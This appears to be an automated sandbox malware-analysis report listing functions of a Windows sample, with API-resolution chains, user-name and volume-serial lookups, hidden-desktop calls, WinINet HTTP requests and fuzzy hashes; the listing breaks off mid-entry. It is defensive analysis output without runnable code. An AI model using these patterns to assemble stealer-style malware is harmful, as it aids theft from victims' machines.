LoadLibraryA.KERNEL32(00A0B918,?,?,?,00421BE3), ref: 0042661D
LoadLibraryA.KERNEL32(00A0B750,?,?,?,00421BE3), ref: 0042662E
LoadLibraryA.KERNEL32(00A0B768,?,?,?,00421BE3), ref: 00426640
GetProcAddress.KERNEL32(75A70000,00A0B690), ref: 0042665D
GetProcAddress.KERNEL32(75290000,00A0B7E0), ref: 00426679
GetProcAddress.KERNEL32(75290000,00A0B8B8), ref: 00426691
GetProcAddress.KERNEL32(75BD0000,00A0B780), ref: 004266AD
GetProcAddress.KERNEL32(75450000,009E4BD0), ref: 004266C9
GetProcAddress.KERNEL32(76E90000,009E6618), ref: 004266E5
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 004266FC

Strings

NtQueryInformationProcess, xrefs: 004266F1

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
Instruction ID: 7b5cedaa0e73423a59cdd3f572970276683dffd84f65f372ce21167b4aa31ce5
Opcode Fuzzy Hash: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
Instruction Fuzzy Hash: E0A16DB9A117009FD758DF65EE88A6637BBF789344300A51EF94683364DBB4A900DFB0

Function 004229E0 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00422A0F
HeapAlloc.KERNEL32(00000000), ref: 00422A16
GetUserNameA.ADVAPI32(00000000,00000104), ref: 00422A2A

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 8d99d318415601690ae838a51b87a7364d012be2201e373feb9efb6fa8a950a4
Instruction ID: aa6ded6259508bede27090f4c861d2ca31da26e1ef70df7e495680ac72f078f7
Opcode Fuzzy Hash: 8d99d318415601690ae838a51b87a7364d012be2201e373feb9efb6fa8a950a4
Instruction Fuzzy Hash: 95F054B1A44614AFD710DF98DD49B9ABBBCF744B65F10021AF915E3680D7B419048BE1

Function 00426710 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,009E4B30), ref: 00426725
GetProcAddress.KERNEL32(74DD0000,009E4AB0), ref: 0042673D
GetProcAddress.KERNEL32(74DD0000,00A0B9A8), ref: 00426756
GetProcAddress.KERNEL32(74DD0000,00A0BA20), ref: 0042676E
GetProcAddress.KERNEL32(74DD0000,00A0B960), ref: 00426786
GetProcAddress.KERNEL32(74DD0000,00A0B9C0), ref: 0042679F
GetProcAddress.KERNEL32(74DD0000,009E8FF8), ref: 004267B7
GetProcAddress.KERNEL32(74DD0000,00A0B9D8), ref: 004267CF
GetProcAddress.KERNEL32(74DD0000,00A0BA08), ref: 004267E8
GetProcAddress.KERNEL32(74DD0000,00A0B9F0), ref: 00426800
GetProcAddress.KERNEL32(74DD0000,00A0DF60), ref: 00426818
GetProcAddress.KERNEL32(74DD0000,009E4C10), ref: 00426831
GetProcAddress.KERNEL32(74DD0000,009E4AD0), ref: 00426849
GetProcAddress.KERNEL32(74DD0000,009E4970), ref: 00426861
GetProcAddress.KERNEL32(74DD0000,009E4990), ref: 0042687A
GetProcAddress.KERNEL32(74DD0000,00A0E110), ref: 00426892
GetProcAddress.KERNEL32(74DD0000,00A0DFD8), ref: 004268AA
GetProcAddress.KERNEL32(74DD0000,009E91B0), ref: 004268C3
GetProcAddress.KERNEL32(74DD0000,009E4C90), ref: 004268DB
GetProcAddress.KERNEL32(74DD0000,00A0DE88), ref: 004268F3
GetProcAddress.KERNEL32(74DD0000,00A0DF78), ref: 0042690C
GetProcAddress.KERNEL32(74DD0000,00A0E020), ref: 00426924
GetProcAddress.KERNEL32(74DD0000,00A0DE40), ref: 0042693C
GetProcAddress.KERNEL32(74DD0000,009E4C30), ref: 00426955
GetProcAddress.KERNEL32(74DD0000,00A0DF90), ref: 0042696D
GetProcAddress.KERNEL32(74DD0000,00A0E038), ref: 00426985
GetProcAddress.KERNEL32(74DD0000,00A0DE58), ref: 0042699E
GetProcAddress.KERNEL32(74DD0000,00A0E068), ref: 004269B6
GetProcAddress.KERNEL32(74DD0000,00A0DE70), ref: 004269CE
GetProcAddress.KERNEL32(74DD0000,00A0DEA0), ref: 004269E7
GetProcAddress.KERNEL32(74DD0000,00A0DEB8), ref: 004269FF
GetProcAddress.KERNEL32(74DD0000,00A0DED0), ref: 00426A17
GetProcAddress.KERNEL32(74DD0000,00A0DF30), ref: 00426A30
GetProcAddress.KERNEL32(74DD0000,009E8BF0), ref: 00426A48
GetProcAddress.KERNEL32(74DD0000,00A0E050), ref: 00426A60
GetProcAddress.KERNEL32(74DD0000,00A0DEE8), ref: 00426A79
GetProcAddress.KERNEL32(74DD0000,009E4A50), ref: 00426A91
GetProcAddress.KERNEL32(74DD0000,00A0DF00), ref: 00426AA9
GetProcAddress.KERNEL32(74DD0000,009E48B0), ref: 00426AC2
GetProcAddress.KERNEL32(74DD0000,00A0E128), ref: 00426ADA
GetProcAddress.KERNEL32(74DD0000,00A0E0B0), ref: 00426AF2
GetProcAddress.KERNEL32(74DD0000,009E49B0), ref: 00426B0B
GetProcAddress.KERNEL32(74DD0000,009E49D0), ref: 00426B23
LoadLibraryA.KERNEL32(00A0DFA8,0042067A), ref: 00426B35
LoadLibraryA.KERNEL32(00A0DF18), ref: 00426B46
LoadLibraryA.KERNEL32(00A0E080), ref: 00426B58
LoadLibraryA.KERNEL32(00A0DF48), ref: 00426B6A
LoadLibraryA.KERNEL32(00A0DFC0), ref: 00426B7B
LoadLibraryA.KERNEL32(00A0DFF0), ref: 00426B8D
LoadLibraryA.KERNEL32(00A0E008), ref: 00426B9F
LoadLibraryA.KERNEL32(00A0E098), ref: 00426BB0
GetProcAddress.KERNEL32(75290000,009E4A10), ref: 00426BCC
GetProcAddress.KERNEL32(75290000,00A0E0E0), ref: 00426BE4
GetProcAddress.KERNEL32(75290000,00A0BAD8), ref: 00426BFD
GetProcAddress.KERNEL32(75290000,00A0E0C8), ref: 00426C15
GetProcAddress.KERNEL32(75290000,009E4EF0), ref: 00426C2D
GetProcAddress.KERNEL32(73440000,009E8FA8), ref: 00426C4D
GetProcAddress.KERNEL32(73440000,009E4FF0), ref: 00426C65
GetProcAddress.KERNEL32(73440000,009E9200), ref: 00426C7E
GetProcAddress.KERNEL32(73440000,00A0E0F8), ref: 00426C96
GetProcAddress.KERNEL32(73440000,00A0E140), ref: 00426CAE
GetProcAddress.KERNEL32(73440000,009E4F70), ref: 00426CC7
GetProcAddress.KERNEL32(73440000,009E4F90), ref: 00426CDF
GetProcAddress.KERNEL32(73440000,00A0E188), ref: 00426CF7
GetProcAddress.KERNEL32(752C0000,009E5050), ref: 00426D13
GetProcAddress.KERNEL32(752C0000,009E4CD0), ref: 00426D2B
GetProcAddress.KERNEL32(752C0000,00A0E1E8), ref: 00426D44
GetProcAddress.KERNEL32(752C0000,00A0E1A0), ref: 00426D5C
GetProcAddress.KERNEL32(752C0000,009E4DD0), ref: 00426D74
GetProcAddress.KERNEL32(74EC0000,009E9020), ref: 00426D94
GetProcAddress.KERNEL32(74EC0000,009E9250), ref: 00426DAC
GetProcAddress.KERNEL32(74EC0000,00A0E200), ref: 00426DC5
GetProcAddress.KERNEL32(74EC0000,009E4E50), ref: 00426DDD
GetProcAddress.KERNEL32(74EC0000,009E5030), ref: 00426DF5
GetProcAddress.KERNEL32(74EC0000,009E9098), ref: 00426E0E
GetProcAddress.KERNEL32(75BD0000,00A0E1B8), ref: 00426E2E
GetProcAddress.KERNEL32(75BD0000,009E4EB0), ref: 00426E46
GetProcAddress.KERNEL32(75BD0000,00A0BBB8), ref: 00426E5F
GetProcAddress.KERNEL32(75BD0000,00A0E1D0), ref: 00426E77
GetProcAddress.KERNEL32(75BD0000,00A0E158), ref: 00426E8F
GetProcAddress.KERNEL32(75BD0000,009E4F50), ref: 00426EA8
GetProcAddress.KERNEL32(75BD0000,009E4CF0), ref: 00426EC0
GetProcAddress.KERNEL32(75BD0000,00A0E170), ref: 00426ED8
GetProcAddress.KERNEL32(75BD0000,00A0E320), ref: 00426EF1
GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 00426F07
GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 00426F1E
GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 00426F35
GetProcAddress.KERNEL32(75A70000,009E4CB0), ref: 00426F51
GetProcAddress.KERNEL32(75A70000,00A0E2D8), ref: 00426F69
GetProcAddress.KERNEL32(75A70000,00A0E518), ref: 00426F82
GetProcAddress.KERNEL32(75A70000,00A0E260), ref: 00426F9A
GetProcAddress.KERNEL32(75A70000,00A0E338), ref: 00426FB2
GetProcAddress.KERNEL32(75450000,009E5010), ref: 00426FCE
GetProcAddress.KERNEL32(75450000,009E4FB0), ref: 00426FE6
GetProcAddress.KERNEL32(75DA0000,009E4D10), ref: 00427002
GetProcAddress.KERNEL32(75DA0000,00A0E3E0), ref: 0042701A
GetProcAddress.KERNEL32(6F070000,009E4E70), ref: 0042703A
GetProcAddress.KERNEL32(6F070000,009E4D70), ref: 00427052
GetProcAddress.KERNEL32(6F070000,009E4FD0), ref: 0042706B
GetProcAddress.KERNEL32(6F070000,00A0E308), ref: 00427083
GetProcAddress.KERNEL32(6F070000,009E4D30), ref: 0042709B
GetProcAddress.KERNEL32(6F070000,009E4ED0), ref: 004270B4
GetProcAddress.KERNEL32(6F070000,009E4E90), ref: 004270CC
GetProcAddress.KERNEL32(6F070000,009E4D50), ref: 004270E4
GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 004270FB
GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00427112
GetProcAddress.KERNEL32(75AF0000,00A0E2C0), ref: 0042712E
GetProcAddress.KERNEL32(75AF0000,00A0BB58), ref: 00427146
GetProcAddress.KERNEL32(75AF0000,00A0E350), ref: 0042715F
GetProcAddress.KERNEL32(75AF0000,00A0E278), ref: 00427177
GetProcAddress.KERNEL32(75D90000,009E4F10), ref: 00427193
GetProcAddress.KERNEL32(6C280000,00A0E368), ref: 004271AF
GetProcAddress.KERNEL32(6C280000,009E4F30), ref: 004271C7
GetProcAddress.KERNEL32(6C280000,00A0E380), ref: 004271E0
GetProcAddress.KERNEL32(6C280000,00A0E290), ref: 004271F8

Strings

CloseDesktop, xrefs: 00426F2A
CreateDesktopA, xrefs: 00426F01
InternetSetOptionA, xrefs: 004270F0
OpenDesktopA, xrefs: 00426F13
HttpQueryInfoA, xrefs: 00427107

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
API String ID: 2238633743-3468015613
Opcode ID: d9010518685dbd8149d20af063d7a7bd964621f9488924b3e0d9ff76a134a9d7
Instruction ID: b02b475b7c59bcec4fa92d45c25333ea948ef94e2fcc8a3fd8fff9104c503747
Opcode Fuzzy Hash: d9010518685dbd8149d20af063d7a7bd964621f9488924b3e0d9ff76a134a9d7
Instruction Fuzzy Hash: 29625EB9A103009FD758DF65ED88AA637BBF789345300A91DF95683364DBB4A800DFB0

Function 0041F300 Relevance: 104.4, APIs: 57, Strings: 2, Instructions: 1164stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0042D01C,00000001,00000000,00000000), ref: 0041F32E
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F34C
lstrlenA.KERNEL32(0042D01C), ref: 0041F357
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F371
lstrlenA.KERNEL32(0042D01C), ref: 0041F37C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F396
lstrcpy.KERNEL32(00000000,00435564), ref: 0041F3BE
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F3EC
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F422
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F454
lstrlenA.KERNEL32(009E4BF0), ref: 0041F476
lstrcpy.KERNEL32(00000000,?), ref: 0041F506
lstrcpy.KERNEL32(00000000,00000000), ref: 0041F52B
lstrcpy.KERNEL32(00000000,00000000), ref: 0041F5E2
StrCmpCA.SHLWAPI(?,ERROR), ref: 0041F894
lstrlenA.KERNEL32(00A0BBD8), ref: 0041F8C2
lstrcpy.KERNEL32(00000000,00A0BBD8), ref: 0041F8EF
lstrcpy.KERNEL32(00000000,00000000), ref: 0041F912
lstrcpy.KERNEL32(00000000,?), ref: 0041F966
lstrcpy.KERNEL32(00000000,00A0BBD8), ref: 0041FA28
lstrcpy.KERNEL32(00000000,00A0BAE8), ref: 0041FA58
lstrcpy.KERNEL32(00000000,?), ref: 0041FAB7
StrCmpCA.SHLWAPI(?,ERROR), ref: 0041FBD5
lstrlenA.KERNEL32(00402E3E), ref: 0041FC03
lstrcpy.KERNEL32(00000000,00402E3E), ref: 0041FC30
lstrcpy.KERNEL32(00000000,00000000), ref: 0041FC53
lstrcpy.KERNEL32(00000000,?), ref: 0041FCA7

Strings

ERROR, xrefs: 0041F788, 0041F88E, 0041FB30, 0041FBCF, 0041FE70, 0041FF0F
>.@, xrefs: 0041FBFB, 0041FD3A

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: >.@$ERROR
API String ID: 367037083-1486603279
Opcode ID: 9904dda6127f26a323bbc236357e09c9ee1fe5f73f385f90d1b19d1ae4a564e2
Instruction ID: cc5225f4657195739226e2497bd3095dc8a2c9716357749900c22e5d1458564d
Opcode Fuzzy Hash: 9904dda6127f26a323bbc236357e09c9ee1fe5f73f385f90d1b19d1ae4a564e2
Instruction Fuzzy Hash: 3CA26D70A017028FC720DF25D948A5BBBE5AF44304F18857EE8499B3A1DB79DC86CF99

Function 004056C0 Relevance: 98.7, APIs: 51, Strings: 5, Instructions: 734
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpy.KERNEL32(00000000,?), ref: 004056EF
lstrlenA.KERNEL32(?), ref: 00405742
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00405784
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004057C3
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004057F3
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00405828

Strings

--, xrefs: 0040598F, 004059B7
------, xrefs: 00405B0B, 00405BFC, 00405CEA
------, xrefs: 00405929, 00405956
", xrefs: 00405BA4, 00405C92, 00405D80
~A, xrefs: 0040576C, 00405FEA, 00405E90

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: ------$"$--$------$~A
API String ID: 367037083-2106860866
Opcode ID: 3ae760454baa2433a10e4dfb7c9e6bd38ce3ae5d14960ce0b0a08ccdc03736b0
Instruction ID: 212b4b6a8a6c145a7523e110c63bb65051ea1ed7585ae654da97c7ff09dcb277
Opcode Fuzzy Hash: 3ae760454baa2433a10e4dfb7c9e6bd38ce3ae5d14960ce0b0a08ccdc03736b0
Instruction Fuzzy Hash: 20426A71E006199BCB10EBB5DD89A9F77B5AF04304F44502AF905B72A1DB78ED028FE8

Function 00418D00 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 174
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpCA.SHLWAPI(?,block,?,?,?,?,0042081F), ref: 00418D1A
ExitProcess.KERNEL32 ref: 00418D27
strtok_s.MSVCRT ref: 00418D39

Strings

block, xrefs: 00418D0B

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 2b5693eeba8fd220ac83beb12232b21ebf595c586142cf98576af706eac3d5ba
Instruction ID: d61f0b7eaf725463d85374e156b8a22592a45d2bf89fa87c178f2814d4d341aa
Opcode Fuzzy Hash: 2b5693eeba8fd220ac83beb12232b21ebf595c586142cf98576af706eac3d5ba
Instruction Fuzzy Hash: 675160B1A047019FC7209F75EC88AAB77F6EB48704B10582FE452D7660DBBCD4828F69

Function 00406B80 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00406BAF
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406C02
InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 00406C15
StrCmpCA.SHLWAPI(?,00A0FE90), ref: 00406C2D
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406C55
HttpOpenRequestA.WININET(00000000,GET,?,00A0FBC8,00000000,00000000,-00400100,00000000), ref: 00406C90
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406CB7
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406CC6
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406CE5
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00406D3F
lstrcpy.KERNEL32(00000000,?), ref: 00406D9B
InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00406DBD
InternetCloseHandle.WININET(00000000), ref: 00406DCE
InternetCloseHandle.WININET(?), ref: 00406DD8
InternetCloseHandle.WININET(00000000), ref: 00406DE2
lstrcpy.KERNEL32(00000000,00000000), ref: 00406E03

Strings

GET, xrefs: 00406C8A
ERROR, xrefs: 00406CF2

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
String ID: ERROR$GET
API String ID: 3687753495-3591763792
Opcode ID: d4dda7033de1c3ef4f9815039b5a93dc3c9111a47bd79444559f63d6606b1acc
Instruction ID: f53a93b1956779abd9a8e71fe9530673e78fc1538c85e26cedc949aa3c7bae39
Opcode Fuzzy Hash: d4dda7033de1c3ef4f9815039b5a93dc3c9111a47bd79444559f63d6606b1acc
Instruction Fuzzy Hash: C1818071B00215ABEB20DFA4DC49BAF77B9AF44700F114169F905F72D0DBB8AD058BA8

Function 004226E0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,00A0BC28), ref: 0042271B
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,0042A470,00000000,00000000,00000000,00000000,?,00A0BC28), ref: 0042274C
GetProcessHeap.KERNEL32(00000000,00000104,?,00A0BC28), ref: 004227AF
HeapAlloc.KERNEL32(00000000,?,00A0BC28), ref: 004227B6
wsprintfA.USER32 ref: 004227DB

Strings

:\, xrefs: 00422735
C, xrefs: 00422725

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
